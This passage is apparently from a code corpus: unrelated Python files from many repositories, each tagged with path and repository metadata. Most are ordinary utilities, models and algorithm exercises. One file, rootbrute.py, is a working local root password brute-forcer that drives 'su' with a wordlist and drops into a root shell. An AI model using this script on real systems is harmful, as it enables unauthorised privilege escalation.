_MESSAGING.set_handler(handler)
def send(message):
""" Send a message with the global message class """
_MESSAGING.send(message)
def send_event(kind, data=None, token=None, room_id=None):
""" Send an event with the global message class """
_MESSAGING.send(event.Event(
kind=kind,
data=data,
token=token,
room_id=room_id
))
def listen():
""" Listen for message with the global message class """
yield from _MESSAGING.listen()
def stop():
""" Stop to listen """
_MESSAGING.stop()
def clear():
""" Clear all the messages"""
_MESSAGING.clear()
4,523
thing/models/serverstatus.py
skyride/evething-2
21
2022953
from django.db import models
class ServerStatus(models.Model):
online = models.BooleanField(default=False)
players = models.IntegerField(default=0)
start_time = models.DateTimeField()
server_version = models.IntegerField()
class TokenNotFound(ValueError):
...
class Parser:
def __init__(self, tokens):
self.date = None
self.tokens = tokens
self.current_token = 0
self.sections = {}
self.parse()
def expect(self, expected):
the_token = self.tokens[self.current_token]
if the_token != expected:
raise TokenNotFound(
f"Unexpected token: {repr(the_token)} at position {self.current_token}"
)
self.current_token += 1
return the_token
def advance_newline(self):
while self.peek() in {" ", "\n"}:
self.current_token += 1
def advance_whitespace(self):
while self.peek() == " ":
self.current_token += 1
def peek(self):
return self.tokens[self.current_token]
def consume(self):
next_token = self.tokens[self.current_token]
self.current_token += 1
return next_token
def expect_tokens(self, tokens):
result = []
for token in tokens:
result.append(self.expect(token))
return result
def parse_header(self):
self.advance_whitespace()
self.expect_tokens("```asciidoc")
self.advance_newline()
def consume_until(self, token):
tokens = []
while self.peek() != token:
tokens.append(self.consume())
return "".join(tokens)
def parse_date(self):
self.advance_whitespace()
self.expect("[")
date = self.consume_until("]")
self.expect("]")
self.advance_newline()
return date
def parse_section(self):
self.advance_whitespace()
# Parse section header
try:
self.expect("=")
except TokenNotFound:
return None
section = self.consume_until("=").strip()
self.expect("=")
self.advance_newline()
items = []
while True:
new_item = self.parse_item()
if not new_item:
break
items.append(new_item)
return (section, items)
def parse_item(self):
try:
self.expect("-")
except TokenNotFound:
return None
self.advance_whitespace()
item = self.consume_until("\n")
self.advance_newline()
return item
def parse_footer(self):
self.advance_whitespace()
self.expect_tokens("```")
def parse(self):
self.parse_header()
self.date = self.parse_date()
while True:
section = self.parse_section()
if not section:
break
section_name, items = section
self.sections[section_name] = items
self.parse_footer()
2,772
create_indexes.py
zafergurel/nginx-cache-cleaner
8
2024548
#!/usr/bin/env python3
'''Nginx Cache Index Generator
Creates index files for each nginx cache folder
'''
import os
import subprocess
import datetime
import sys
# Script parameters
cache_folder = "/cache"
index_folder = "/cache/_cacheindex"
default_cache_duration = 30
current_dir = os.path.dirname(os.path.realpath(__file__))
index_creator_script = current_dir + "/bin/create_index.sh"
dir_empty_check_script = current_dir + "/bin/is_empty_dir.sh"
def create_indexes(op_mode="append"):
'''Creates index files for each nginx cache folder.
op_mode can be append or create
In "append" mode, index file creation dates are checked and only
recently added cache files are added to index file.
In "create" mode index files are re-created.
Default mode is append.
'''
if op_mode != "append" and op_mode != "create":
op_mode = "append"
if not os.path.exists(index_folder):
subprocess.Popen(["mkdir", "-p", index_folder]).wait()
folders = get_folders(cache_folder)
for f in folders:
index_file = index_folder + "/" + f.replace("/", "_") + ".ind"
delta = -1 * default_cache_duration
if os.path.exists(index_file) and op_mode == "append":
# get creation time
ctime = datetime.datetime.fromtimestamp(os.stat(index_file).st_mtime)
delta = -1 * round((datetime.datetime.now() - ctime).seconds / 3600 / 24, 2)
# delta cannot be less than default duration
if delta < -1 * default_cache_duration:
delta = -1 * default_cache_duration
if delta < 0:
print("Cache operation: "+ op_mode + " -> " + f + " (" + str(delta) + " days)")
subprocess.Popen([index_creator_script, op_mode, f, index_file, str(delta)]).wait()
def is_empty_dir(dir_path):
'''Checks whether a directory is empty or not
'''
result = "0"
with subprocess.Popen([dir_empty_check_script, dir_path],stdout=subprocess.PIPE) as proc:
result = proc.stdout.read().decode().strip()
return result == "1"
def get_folders(base_folder):
'''Returns all the folders (except index_folder) under
cache folder.
'''
folders = []
for root, dirs, _ in os.walk(base_folder):
for dir in dirs:
full_path = root + "/" + dir
if full_path != index_folder and not is_empty_dir(full_path):
folders.append(full_path)
return folders
if __name__ == "__main__":
op_mode = sys.argv[1] if len(sys.argv) > 1 else "append"
create_indexes(op_mode)
2,578
examples/demo.py
christophevg/py-mqfactory
0
2024515
import time
import socket
# The core of the factory allows for instantiating a `MessageQueue`. Such an MQ
# has an inbox and an outbox, which can be processed using the `process_inbox`
# and `process_outbox` methods (or the `send_and_receive` method). To automate
# this we can apply `Threaded` to the MQ to automate calling these methods.
from mqfactory import Threaded, MessageQueue
# An MQ needs at least a way to send its message, this is a `Transport`. Here we
# use an MQTT implementation.
from mqfactory.transport.mqtt import MQTTTransport
# One aspect of transporting messages is how much care is taken in making sure
# they are delivered. This is often called quality of service and can take many
# forms. Here we choose to retry sending messages untill they are acknowledged.
from mqfactory.transport.qos import Acknowledging
# An MQ takes any payload and will pass it as-is. Here we choose to have the
# payload formatted using JSON, taking care of serializing and deserializing.
from mqfactory.message.format.js import JsonFormatting
# A standard MQ will hold its messages in a `Queue` in memory. Using a
# `Collection` in a `Store` we can persist these, e.g. to a `MongoStore`.
from mqfactory.store import Persisting
from mqfactory.store.mongo import MongoStore
# Let's use a localy running MongoDB instance:
mongo = MongoStore("mongodb://localhost:27017/mqfactory")
# Beside formatting it using JSON, we also choose to have our payload signed and
# validated using a public/private keypair. Keys for these signatures are also
# storable in a `Collection` in a `Store`, such as the `MongoStore`.
from mqfactory.message.security import Signing
from mqfactory.message.security.rsa import RsaSignature
# Since we want to sign our messages, we need to provision a keypair.
from mqfactory.message.security.rsa import generate_key_pair, encode
private, public = generate_key_pair()
# We store the keypair in a MongoDB collection(keys) and identify the pair by
# our hostname, which is the default used by MQFactory.
HOSTNAME = socket.gethostname()
mongo["keys"].remove(HOSTNAME)
mongo["keys"].add({
"_id": HOSTNAME,
"private": encode(private),
"public" : encode(public)
})
# Now we can finally assemble all these components into our own specific MQ,
# adding layer after layer:
mq = JsonFormatting(
Signing(
Acknowledging(
Persisting(
Threaded(
MessageQueue(
MQTTTransport("mqtt://localhost:1883")
)
),
inbox=mongo["inbox"],
outbox=mongo["outbox"]
)
),
adding=RsaSignature(mongo["keys"])
)
)
# When receiving a message, just print it to the console...
def show(msg):
print "received {0} from {1}, tagged with {2}".format(
msg.payload, msg.to, msg.tags
)
# Subscribe to incoming messages addressed to myself and handle them with show.
mq.on_message("myself", show)
# Finally, send a message ... to myself.
mq.send("myself", "a message")
time.sleep(1) # to make sure we receive the answer ;-)
3,163
modoboa/transport/models.py
Arvedui/modoboa
2
2024317
# -*- coding: utf-8 -*-
"""Transport models."""
from __future__ import unicode_literals
import jsonfield
from reversion import revisions as reversion
from django.db import models
from django.utils.translation import ugettext_lazy as _
from . import backends
class Transport(models.Model):
"""Transport table."""
pattern = models.CharField(
_("pattern"), unique=True, max_length=253, db_index=True)
service = models.CharField(_("service"), max_length=30)
next_hop = models.CharField(_("next hop"), max_length=100, blank=True)
_settings = jsonfield.JSONField(default={})
class Meta:
ordering = ["pattern"]
def __str__(self):
return self.pattern
@property
def backend(self):
"""Shortcut to access backend."""
if not self.service:
return None
return backends.manager.get_backend(self.service)
reversion.register(Transport)
cache = {}
def stepPerms(n):
if n == 0:
return 1
if n in cache:
return cache[n]
with_one = with_two = with_three = 0
if n >= 1:
with_one = stepPerms(n-1)
if n >= 2:
with_two = stepPerms(n-2)
if n >= 3:
with_three = stepPerms(n-3)
cache[n] = with_one + with_two + with_three
return cache[n]
if __name__ == "__main__":
print(stepPerms(7))
420
inql/burp_ext/generator_tab.py
AmesCornish/inql
0
2023338
from __future__ import print_function
import platform
if platform.system() != "Java":
print("Load this file inside jython, if you need the stand-alone tool run: inql")
exit(-1)
import json
from burp import ITab
from inql.actions.sendto import RepeaterSenderAction, OmniMenuItem, EnhancedHTTPMutator, GraphiQLSenderAction
from inql.actions.setcustomheader import CustomHeaderSetterAction
from inql.widgets.generator import GeneratorPanel
class GeneratorTab(ITab):
"""
Java GUI
"""
def __init__(self, callbacks, helpers):
self._callbacks = callbacks
self._helpers = helpers
def getTabCaption(self):
"""
Override ITab method
:return: tab name
"""
return "InQL Scanner"
def getUiComponent(self):
"""
Override ITab method
:return: Tab UI Component
"""
overrideheaders = {}
repeater_omnimenu = OmniMenuItem(callbacks=self._callbacks, helpers=self._helpers, text="Send to Repeater")
graphiql_omnimenu = OmniMenuItem(callbacks=self._callbacks, helpers=self._helpers, text="Send to GraphiQL")
http_mutator = EnhancedHTTPMutator(
callbacks=self._callbacks, helpers=self._helpers, overrideheaders=overrideheaders)
repeater_sender = RepeaterSenderAction(omnimenu=repeater_omnimenu, http_mutator=http_mutator)
graphiql_sender = GraphiQLSenderAction(omnimenu=graphiql_omnimenu, http_mutator=http_mutator)
custom_header_setter = CustomHeaderSetterAction(overrideheaders=overrideheaders, text="Set Custom Header")
try:
restore = self._callbacks.loadExtensionSetting(GeneratorPanel.__name__)
except Exception as ex:
print("Cannot restore state! %s" % ex)
restore = None
proxy = None
for request_listener in json.loads(self._callbacks.saveConfigAsJson())["proxy"]["request_listeners"]:
if request_listener["running"]:
proxy = "localhost:%s" % request_listener["listener_port"]
break
self.panel = GeneratorPanel(
actions=[
repeater_sender,
graphiql_sender,
custom_header_setter],
restore=restore,
proxy=proxy,
http_mutator=http_mutator,
texteditor_factory=self._callbacks.createTextEditor
)
self._callbacks.customizeUiComponent(self.panel.this)
return self.panel.this
def bring_in_front(self):
self.panel.this.setAlwaysOnTop(True)
self.panel.this.setAlwaysOnTop(False)
def save(self):
"""
Save Extension State before exiting
:return: None
"""
try:
self._callbacks.saveExtensionSetting(self.panel.__class__.__name__, self.panel.state())
except:
print("Cannot save state!")
2,902
File Conversion/convert_offline_case.py
mewturn/Python
0
2023977
class OfflineCase:
def __init__(self, filename):
self.filename = filename
self.output_filename = filename.split(".")[0]
self.parseSegments()
def parseSegments(self):
import openpyxl
self.segments = []
wb = openpyxl.load_workbook(self.filename)
for sheetname in wb.sheetnames:
sheet = wb[sheetname]
i = 4
while True:
id = sheet[f"A{i}"].value
source = sheet[f"B{i}"].value
if id is not None and source is not None:
target = sheet[f"C{i}"].value
if target is None:
target = ""
self.segments.append(Segment(id, source, target))
i += 1
else:
break
def convert(self, ext):
ext_map = {
"tmx": self.convertTMX(),
"xliff": self.convertXLIFF()
}
output_filename = f"{self.output_filename}.{ext}"
header, body, footer = ext_map[ext]
with open(output_filename, "w", encoding="utf-8") as f:
f.write(header)
f.write(body)
f.write(footer)
def convertTMX(self):
header = "<?xml version='1.0' encoding='UTF-8'?>\n"
header += "<tmx version='1.4'>\n"
header += "<header adminlang='en' creationtool='WritePath Translation Editor' creationtoolversion='1.0' datatype='tbx' o-tmf='unknown' segtype='block'/>\n"
header += "<body>\n\n"
body = ""
if self.segments:
for segment in self.segments:
body += f"<tu origin='tbx' tuid='{segment.id}'>\n"
body += "<tuv xml:lang='zh-TW'>\n"
body += f"<seg>{segment.source}</seg>\n"
body += "</tuv>\n"
body += "<tuv xml:lang='en'>\n"
body += f"<seg>{segment.target}</seg>\n"
body += "</tuv>\n"
body += "</tu>\n\n"
footer = "</body>\n"
footer += "</tmx>\n"
return header, body, footer
def convertXLIFF(self):
header = "<?xml version='1.0' encoding='UTF-8'?>\n"
header += "<xliff version='1.2' xmlns='urn:oasis:names:tc:xliff:document:1.2'>\n"
header += "<file original='writepath-case112066' datatype='plaintext' source-language='zh-TW' target-language='en'>\n"
header += "<body>\n\n"
body = ""
if self.segments:
for segment in self.segments:
body += f"<trans-unit id='{segment.id}'>\n"
body += f"<source id='{segment.id}'>{segment.source}</source>\n"
body += f"<target id='{segment.id}' state='translated'>{segment.target}</target>\n"
body += "</trans-unit>\n\n"
footer = "</body>\n"
footer += "</file>\n"
footer += "</xliff>\n"
return header, body, footer
class Segment:
def __init__(self, id, source, target):
self.id = id
self.source = self.cleanStringForXML(source)
self.target = self.cleanStringForXML(target)
def cleanStringForXML(self, text, reverse=False):
find_and_replace = {
"&": "&",
"\"": """,
"'": "'",
"<": "<",
">": ">"
}
text = str(text)
for k, v in find_and_replace.items():
if reverse:
text = text.replace(v, k)
else:
text = text.replace(k, v)
return text.strip()
if __name__ == "__main__":
import os
import time
ext_num = input("Select output format - [1]: TMX, [2]: XLIFF\nEnter number: ")
ext_map = {
"1": "tmx",
"2": "xliff"
}
try:
for i in os.listdir():
if ".xlsx" in i:
start_time = time.time()
print(f"Processing file {i}")
offline_case = OfflineCase(i)
offline_case.convert(ext_map[ext_num])
elapsed_time = round(time.time() - start_time, 2)
print(f"Success! Completed in {elapsed_time} seconds.")
input("Task completed. Press <Enter> to close this window.")
except Exception as e:
input(f"An error occurred. {repr(e)}. Press <Enter> to close this window.")
#!/usr/bin/env python3
from math import sqrt
def solution(n):
"""
Returns the minimal perimeter for a rectangle of area n.
"""
# given the sides a and b, the area of a rectangle is n = a*b and the perimeter is 2 * (a + b)
# for a minimal perimeter, we have to minimize the difference between a and b
for i in range(int(sqrt(n)), 0, -1):
# a and b must be the closest possible to sqrt(n)
if n % i == 0:
return 2*(i + n//i)
453
rootbrute.py
lucthienphong1120/full-45-bruteforce-tools
1
2023280
#!/usr/bin/python
#Local Root BruteForcer
#More Info: http://forum.darkc0de.com/index.php?action=vthread&forum=8&topic=1571
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import sys
try:
import pexpect
except(ImportError):
print "\nYou need the pexpect module."
print "http://www.noah.org/wiki/Pexpect\n"
sys.exit(1)
#Change this if needed.
LOGIN_ERROR = 'su: incorrect password'
def brute(word):
print "Trying:",word
child = pexpect.spawn ('su')
child.expect ('Password: ')
child.sendline (word)
i = child.expect (['.+\s#\s',LOGIN_ERROR])
if i == 0:
print "\n\t[!] Root Password:",word
child.sendline ('whoami')
print child.before
child.interact()
#if i == 1:
#print "Incorrect Password"
if len(sys.argv) != 2:
print "\nUsage : ./rootbrute.py <wordlist>"
print "Eg: ./rootbrute.py words.txt\n"
sys.exit(1)
try:
words = open(sys.argv[1], "r").readlines()
except(IOError):
print "\nError: Check your wordlist path\n"
sys.exit(1)
print "\n[+] Loaded:",len(words),"words"
print "[+] BruteForcing...\n"
for word in words:
brute(word.replace("\n",""))
import os, time, sys
from Plugins.Configs.Settings import *
def Updates_Page():
print(Dark_Blue + BG_Dark_Green + Line + Rest)
clearConsole()
Index_Banner()
for char in Banner_msg:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.0)
print(Dark_Blue + BG_Dark_Green + "")
for char in Line:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.500)
print(Rest + Bright_Green + BG_Dark_Blue)
for char in Endl:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.0)
print(Rest +"")
print(Bright_Yellow)
Auto_Text_15 = "Updates"
for char in Auto_Text_15:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.1)
print("")
#The Org Message
print(Bright_Yellow)
Auto_Text_11 = "The Organization Updates"
for char in Auto_Text_11:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.1)
print("")
print(Dark_Cyan)
Auto_Text_12 = "Date: 20/02/2022 Updates"
for char in Auto_Text_12:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.3)
print("")
print(Bright_Green +"The Org is finally in it's own level of\n\
trust with it's members to share and make use of this script. This Script")
print("Containing The Org data as our members\n\
agreed to share their public cryptic info throw the BlackDoc")
print(Bright_Red +"Please Note; All information in this\n\
document is classified to unmembers of\n\
The Org")
print("Make sure you dont share this script!")
print(Dark_Blue + BG_Dark_Green + Line + Rest)
print(Dark_Blue + BG_Dark_Green + Line + Rest)
#New Members Updates
print(Bright_Yellow)
Auto_Text_13 = "New Members List"
for char in Auto_Text_13:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.1)
print("")
print(Dark_Cyan)
Auto_Text_14 = "Date: 21/03/2022 Updates "
for char in Auto_Text_14:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.3)
print("")
print(Dark_Magenta + Ms1 + Bright_Red +". Theres No New Members...")
print(Bright_Green +"Use Menu -> Then Cammand; 'Memberships'\n\
To See The Full Memberships Borad.")
print(Dark_Blue + BG_Dark_Green + Line + Rest)
print(Dark_Blue + BG_Dark_Green + Line + Rest)
#About The BlackDoc
print(Bright_Yellow)
Auto_Text_17 = "About BlackDoc Updates"
for char in Auto_Text_17:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.1)
print("")
print(Bright_Cyan)
Auto_Text_16 = "Date: 22/02 - 01/03/2022 Updates"
for char in Auto_Text_16:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.3)
print()
print(Bright_Green +"About The Script.")
print("You using;")
print("Name: BlackDocument.py")
print("Version: V0.0.03")
print("Security Level: "+ Ms1 + ".03")
print("Developed By: CHHOrg")
print("Promoted By: DarkDoor")
print("Released Date: 20/02/2022")
print(Dark_Blue + BG_Dark_Green + Line + Rest)
print(Dark_Blue + BG_Dark_Green + Line + Rest)
print(Bright_Yellow)
Auto_Text_18 = "Errors, Fixed Errors and New Features\n\
Updates"
for char in Auto_Text_18:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.1)
print("")
print(Dark_Cyan)
Auto_Text_10 = "Date: 21/02/2022 Updates\n\
[(Old Version)]"
for char in Auto_Text_10:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.3)
print("")
print(Bright_Red)
Auto_Text_9 = "[+] -> FIXED Errors"
for char in Auto_Text_9:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.5)
print("")
print(Bright_Magenta + Ms1 + Bright_Green +"). Fixed all spelling errors")
print(Bright_Magenta + Ms2 + Bright_Green +"). Fixed all cutting words")
print(Bright_Magenta + Ms3 + Bright_Green +"). Fixed underlinings Lan")
print(Bright_Magenta + Ms4 + Bright_Green +"). Fixed underlining divisions")
print("for each page in our Menu")
print(Bright_Magenta + Ms5 + Bright_Green +"). Fixed directory folder in Zip")
print(Dark_Blue + BG_Dark_Green + Line + Rest)
print(Bright_Red)
Auto_Text_8 = "[+] -> New Features"
for char in Auto_Text_8:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.5)
print("")
print(Bright_Magenta + Ms1 + Bright_Green +"). We added Colors")
print(Bright_Magenta + Ms2 + Bright_Green +"). We added Banner")
print(Bright_Magenta + Ms3 + Bright_Green +"). We added more error messages")
print(Dark_Blue + BG_Dark_Green + Line + Rest)
print(Bright_Cyan + "")
Auto_Text_7 = "Date: 22/02 - 01/03/2022 Updates\n\
([Previous Version])"
for char in Auto_Text_7:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.3)
print(Bright_Red + "")
Auto_Text_6 = "[+] -> FIXED Errors"
for char in Auto_Text_6:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.5)
print("")
print(Bright_Magenta + Ms1 + Bright_Green +"). Fixed Menu Borders")
print(Dark_Blue + BG_Dark_Green + Line + Rest)
print(Bright_Red + "")
Auto_Text_5 = "[+] -> New Features"
for char in Auto_Text_5:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.5)
print("")
print(Bright_Magenta + Ms1 + Bright_Green +"). We added new menu items")
print(Bright_Magenta + Ms2 + Bright_Green +"). We added script animation")
print(Bright_Magenta + Ms3 + Bright_Green +"). We added new security for exits")
print(Bright_Magenta + Ms4 + Bright_Green +"). We added a Bot")
print(Bright_Magenta + Ms5 + Bright_Green +"). We added Commands")
print(Bright_Magenta + Ms6 + Bright_Green +"). We added Org Rules at More. in Menu")
print(Bright_Magenta + Ms7 + Bright_Green +"). We added Loading Progress")
print(Dark_Blue + BG_Dark_Green + Line + Rest)
print(Bright_Red +"")
Auto_Text_4 = "[+] -> Errors"
for char in Auto_Text_4:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.5)
print("")
print(Bright_Magenta + Ms1 + Bright_Green +"). Chat Option in Menu for Termux/Linux\n\
Is not working!!!\n\
\n\
Note: In Termux we run TermuxRun.sh after\n\
Installations.")
print(Bright_Magenta + Ms2 + Bright_Green +"). Other Items in Menu they are\n\
Unavailable")
print(Bright_Magenta + Ms3 + Bright_Green +"). The script is still under Developing")
print(Dark_Blue + BG_Dark_Green + Line + Rest)
print(Dark_Blue + BG_Dark_Green + Line + Rest)
print(Bright_Cyan + "")
Auto_Text_7 = "Date: 01/03 - 21/03/2022 Updates\n\
([New Version])"
for char in Auto_Text_7:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.3)
print(Bright_Red + "")
Auto_Text_6 = "[+] -> FIXED Errors"
for char in Auto_Text_6:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.5)
print("")
print(Bright_Magenta + Ms1 + Bright_Green +"). Fixed Login Security")
print(Bright_Magenta + Ms2 + Bright_Green +"). Fixed More Menu Logout System")
print(Bright_Magenta + Ms3 + Bright_Green +"). Fixed Directory Of Game; EvilNinja")
print(Bright_Magenta + Ms3 + Bright_Green +"). Fixed Updates Page (Updates Numbering)")
print(Dark_Blue + BG_Dark_Green + Line + Rest)
print(Bright_Red + "")
Auto_Text_5 = "[+] -> New Features"
for char in Auto_Text_5:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.5)
print("")
print(Bright_Magenta + Ms1 + Bright_Green +"). We added loop")
print(Bright_Magenta + Ms2 + Bright_Green +"). We we changed colors")
print(Bright_Magenta + Ms3 + Bright_Green +"). We advanced login security")
print(Bright_Magenta + Ms4 + Bright_Green +"). We added a game called EvilNinja")
print(Bright_Magenta + Ms5 + Bright_Green +"). We modified the program")
print(Bright_Magenta + Ms6 + Bright_Green +"). We made more menu items available")
print(Bright_Magenta + Ms7 + Bright_Green +"). Hacking Lessons Will Be Available\n\
Date; 01/04/2022")
print(Dark_Blue + BG_Dark_Green + Line + Rest)
print(Bright_Red +"")
Auto_Text_4 = "[+] -> Errors"
for char in Auto_Text_4:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.5)
print("")
print(Bright_Magenta + Ms1 + Bright_Green +"). Chat Option in Menu for Termux/Linux\n\
Is not working!!!\n\
\n\
Note: BlackDoc Might Be In Github\n\
But Is Still Under developing.")
print(Bright_Magenta + Ms1 + Bright_Green +"). Other Items in Menu they are\n\
Unavailable")
print(Bright_Magenta + Ms2 + Bright_Green +"). The script is still under Developing")
print(Dark_Blue + BG_Dark_Green + Line + Rest)
print(Dark_Blue + BG_Dark_Green + Line + Rest)
9,158
src/moz_image/main.py
mozkzki/moz-image
0
2024489
import os
import sys
import uuid
import requests
from contextlib import contextmanager
from dotenv import load_dotenv
from PIL import Image as pimage
GYAZO_UPLOAD_URL = "https://upload.gyazo.com/api/upload"
@contextmanager
def download(url: str):
image = _download_image(url)
save_file_path = _save_image(image)
try:
yield save_file_path
finally:
os.remove(save_file_path)
def _download_image(url: str, timeout: int = 10) -> bytes:
response = requests.get(url, allow_redirects=False, timeout=timeout)
if response.status_code != 200:
e = Exception("HTTP status: " + str(response.status_code))
raise e
content_type = response.headers["content-type"]
if "image" not in content_type:
e = Exception("Content-Type: " + str(content_type))
raise e
return response.content
def _make_save_file_path() -> str:
file_name = str(uuid.uuid4())
save_file_path = os.path.join("/tmp/mmimage/", file_name)
return save_file_path
def _save_image(image: bytes) -> str:
save_file_path = _make_save_file_path()
# ディレクトリが存在しない場合は作る
os.makedirs(os.path.dirname(save_file_path), exist_ok=True)
with open(save_file_path, "wb") as fout:
fout.write(image)
return save_file_path
def resize(path: str, *, width: int = 302) -> None:
if os.path.isfile(path) is not True:
print("file does not exists. path={}".format(path), file=sys.stderr)
return
img = pimage.open(path)
# 保存先のファイル名作成
# フォーマット指定がないとエラーになる
new_path = "".join((path, ".", img.format))
# 画像の解像度を取得して、リサイズする高さを計算
img_width, img_height = img.size
resize_width = float(width)
resize_height = resize_width / img_width * img_height
# 画像をリサイズ
img = img.resize((int(resize_width), int(resize_height)))
img.save(new_path)
# 古いファイルと入れ替える
os.remove(path)
os.rename(new_path, path)
def upload_to_gyazo(path: str, access_token: str = None) -> str:
image = open(path, "rb")
files = {"imagedata": image}
# files = {"imagedata": ("filename", image, "image")}
# 引数指定がなければ環境変数からaccess token読み込み
if access_token is None:
load_dotenv(verbose=True)
access_token = os.environ.get("gyazo_access_token", "dummy_token")
data = {"access_token": access_token}
response = requests.post(GYAZO_UPLOAD_URL, files=files, data=data)
if response.reason == "Unauthorized" and response.status_code == 401:
print(
"[error] gyazo access token is invalid!",
"please set correct token by environment variable <gyazo_access_token>.",
)
return ""
url = response.json()["url"]
print("------------- URL: ", url)
return url
2,744
src/other/sbl.py
sgherbst/simple-base-lib
1
2024217
import sblc
import os
# set working dir to SBL's dataPath
# fix(later): should do this directly from C++ code
os.chdir( sblc.dataPath() )
# convert a python value to a string value suitable to for SBL commands/configs
def strProc( val ):
valStr = str( val );
if valStr == "False":
valStr = "0"
if valStr == "True":
valStr = "1"
return valStr
# represents an entry in a configuration file
class ConfigEntry:
# basic constructor
def __init__( self, _name, _value, _comment ):
self.name = _name
self.value = _value
self.comment = _comment
# represents a configuration file
class Config:
# basic constructor
def __init__( self ):
self.__dict__[ "_entries" ] = []
# add a config entry
def __setattr__( self, name, value ):
if not name.startswith( "_" ):
found = False
for e in self._entries: # fix(later): use dict (though want to maintain order)
if e.name == name:
e.value = value
found = True
if not found:
self._entries.append( ConfigEntry( name, value, "" ) )
# read a config entry
def __getattr__( self, name ):
if not name.startswith( "_" ):
for e in self._entries: # fix(later): use dict (though want to maintain order)
if e.name == name:
return e.value
raise AttributeError
# create a string version suitable for passing to an SBL command
def __str__( self ):
s = ""
for e in self._entries:
if e.name:
s += e.name + "=" + strProc( e.value ) + " "
return s
# load a configuration file (in SBL format)
def load( self, fileName ):
f = open( fileName, "r" )
if f:
for line in f:
line = line.strip()
# get comments/meta-data
preComment = line
comment = ""
if '[' in line:
split = line.split( '[', 1 )
preComment = split[ 0 ]
comment = "[" + split[ 1 ]
elif '#' in line:
split = line.split( '#', 1 )
preComment = split[ 0 ]
comment = "#" + split[ 1 ]
# get name and value (if any)
name = ""
value = ""
split = preComment.split()
if len( split ) >= 2:
name = split[ 0 ]
value = split[ 1 ]
# append an entry (even for blank lines)
self._entries.append( ConfigEntry( name, value, comment ) )
# save this configuration file (in SBL format)
def save( self, fileName ):
f = open( fileName, "w" )
if f:
for e in self._entries:
if e.name:
f.write( e.name )
f.write( " " )
f.write( strProc( e.value ) )
if e.comment:
f.write( " " )
if e.comment:
f.write( e.comment )
f.write( "\n" )
# provides a simple interface to SBL commands
class CommandRouter:
# return true if user has requested that the current command stop running
def checkCommandCancel( self ):
return sblc.checkCommandEvents()
# display a message
def disp( self, indent, message ):
sblc.disp( 0, indent, message )
# display a warning
def warning( self, message ):
sblc.disp( 1, 0, message )
# display a fatal error (will terminate program)
def fatalError( self, message ):
sblc.disp( 2, 0, message )
# assume all other method calls are commands; send to SBL C++ command system
def __getattr__( self, name ):
if not name.startswith( "_" ):
def runCommand( *args, **keywords ):
cmdStr = name + " " + " ".join( [strProc( a ) for a in args] )
sblc.execCommand( cmdStr )
return runCommand
else:
raise AttributeError
4,214
aiobot/exceptions/__init__.py
thedyrn/aio-vkbot
2
2023480
from .vk_error import VkError
from .aiobot_error import NoneSessionError
__all__ = [VkError, NoneSessionError]
111
binary-search/python/binary_search.py
abccdabfgc/algorithms-java
16
2023290
#!/usr/bin/env python3
import os, json
def binary_search(key, arr):
lo = 0
hi = len(arr) - 1
while lo <= hi:
mid = lo + (hi - lo) // 2;
if key < arr[mid]:
hi = mid - 1
elif key > arr[mid]:
lo = mid + 1
else:
return mid
return -1
def main():
with open(os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'input.json')) as f:
for input in json.load(f):
r = binary_search(input['key'], input['array'])
print('binary_search(%s, %s) => %s' % (input['key'], input['array'], r))
if input['result'] != r:
raise Error('failed. expected = %s, actual = %s' % (input['result'], r))
if __name__ == '__main__':
main()
782
test/test_chained_func_call.py
mad-center/bilibili-mad-crawler
0
2023173
def foo(next=True):
print('foo')
return next
def bar():
print('bar')
return False
foo(next=True) and bar()
print('=' * 50)
foo(next=False) and bar()
169
number_terms.py
mvgugaev/Python-Algorit-Stepik
11
2024530
import time
# Задача: По данному числу 1 <= n <=10^9 найдите максимальное число k,
# для которого nn можно представить как сумму k различных натуральных слагаемых.
# Выведите в первой строке число k, во второй — k слагаемых.
# Input:
# 6
# 120 30
# Output:
# 3
# 1 2 3
# Time: 4.935264587402344e-05 s
def main():
n = int(input())
# Get start time
start = time.time()
result, part = [], 1
while n != 0:
while part * 2 >= n and part != n:
part += 1
result.append(part)
n -= part
part += 1
print(str(len(result)) + '\n' + ' '.join([str(i) for i in result]))
# Show time
print('Time: ', time.time() - start, 's')
if __name__ == "__main__":
main()
737
init_db.py
MardanovTimur/aiochat
0
2024326
from sqlalchemy import create_engine, MetaData
from chatapp.settings import config
from chatapp.models import user, friends
from aiopg.sa.engine import aiopg
DSN = 'postgresql://{user}:{password}@{host}:{port}/{database}'
def create_tables(engine):
""" Initialize the database
"""
meta = MetaData()
meta.create_all(bind=engine, tables=[user, friends])
def sample_data(engine):
""" Creates the sample data in database
"""
conn = engine.connect()
conn.execute(user.insert(), [
{
'username': 'timurmardanov97',
},
{
'username': 'jax02',
},
])
conn.close()
async def init_pg(app):
conf = app['config']['postgres']
engine = await aiopg.sa.create_engine(**conf)
app['db'] = engine
async def close_pg(app):
app['db'].close()
await app['db'].wait_closed()
if __name__ == '__main__':
db_url = DSN.format(**config['postgres'])
engine = create_engine(db_url)
create_tables(engine)
sample_data(engine)
import sqlite3
import os
class Table(object):
def __init__(self, conn, table_name, columns):
"""
columns: list of columns, which is itself a list of:
column name, column SQL type, default value, is index.
